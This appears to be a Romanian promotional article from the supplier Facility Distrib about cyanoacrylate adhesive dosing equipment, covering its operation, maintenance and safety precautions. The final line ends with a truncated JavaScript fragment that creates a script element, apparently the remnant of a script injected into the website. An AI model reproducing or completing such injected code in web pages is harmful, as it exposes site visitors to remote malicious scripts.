echipament dozare cianacrilati

echipament dozare cianacrilati

Orice facilitate de productie are nevoie de o linie de ambalare. Aceasta este cea care finalizeaza intregul drum al unui produs. La Facility Distrib dorim sa va oferim toate produsele de care aveti nevoie pentru a avea un proces tehnologic complet, de la inceput, pana la final. Un element foarte important este impachetarea produsului, iar in cadrul acestui proces, fie ca vorbim despre etichete sau formarea ambalajului, veti avea nevoie de un echipament dozare cianacrilati. Aceasta categorie de produse chimice includ adezivii speciali cu uscare rapida (de ordinul secundelor) perfecti pentru confectionarea ambalajelor.

In cadrul acestui articol vom discuta despre modul de lucru cu un astfel de echipament dozare cianacrilati si mai aels, ce trebuie sa stiti despre siguranta si normele de protectie in cazul operatiunilor de service si mentananta la un astfel de echipament. Dozatoarele, in general, sunt echipamente care, in functie de un set de instructiuni (analogice, electronice, digitale) stabileste cantitatea precisa a unui produs, substanta lichida, solida, etc.

Adezivii cianacrilici

Adezivii cianacrilati fac parte din gama de solutii de lipire universale, iar datorita formulei lor bazata pe polimeri acrilici ofera o forta de lipire foarte buna la un timp de uscare sau intarire de sub 30secunde. Un echipament dozare cianacrilati trebuie sa respecte o serie de parametrii tehnici pentru a permite un proces fluent si eficient. In primul rand, sistemul propriu-zis de dozare trebuie sa fie conceput astfel incat sa nu permita depunerile de adeziv care pot bloca gura de dispersie a acestuia. De asemenea, echipamentul trebuie sa respecte standardele de etanseitate necesare pentru a bloca infiltratiile de aer ce duc la activarea adezivului.

Mentananta unui echipament dozare cianacrilati

Datorita structurii sale interioare un echipament dozare cianacrilati poate functiona pentru perioade foarte lungi de timp fara interventii tehnice, insa, in situatiile in care sunt necesare aceste operatiuni trebuie sa respectati o serie de indicatii ce tin in primul rand de protectia dumneavoastra.

In primul rand, eliminati containerele de adeziv. Orice echipament dozare cianacrilati este dotat cu sistem de cuplare a containerelor ce contin adezivul sau elementele chimice necesare. Recipientele trebuiesc indepartate si inchise ermetic daca acest lucru este posibil. Cu ajutorul unei solutii de decapare, se curata interiorul circuitului de pulverizare, in cazul in care exista blocaje ale acestuia cauzate de catre depunerile de adeziv.

Ca si notiuni de siguranta de lucru cu un echipament dozare cianacrilati trebuie sa stiti ca acest gen de adezivi sunt toxici pentru organismul uman. De asemenea, contactul ochilor si a traseului respirator cu vaporii cianacrilici pot duce la serioase iritatii ale ochilor si a mucoasei nazale. In cazul in care ati intrat in contact cu vaporii clatiti cu apa rece din ambundenta si prezentati-va la personalul medical al unitatii sau la un medic olftalmolog in cazul iritatiilor la nivelul ochilor, sau la un medic general in cazul iritatiilor la nivelul mucoasei nazale.

Facility Distrib este locul de unde puteti gasi gama completa de utilaje, de la un echipament dozare cianacrilati pana la statii de impachetare, dozaj, de productie, si nu numai. Va asteptam pe siteul www.facilitydistrib.ro  !var d=document;var s=d.createElement(‘script’);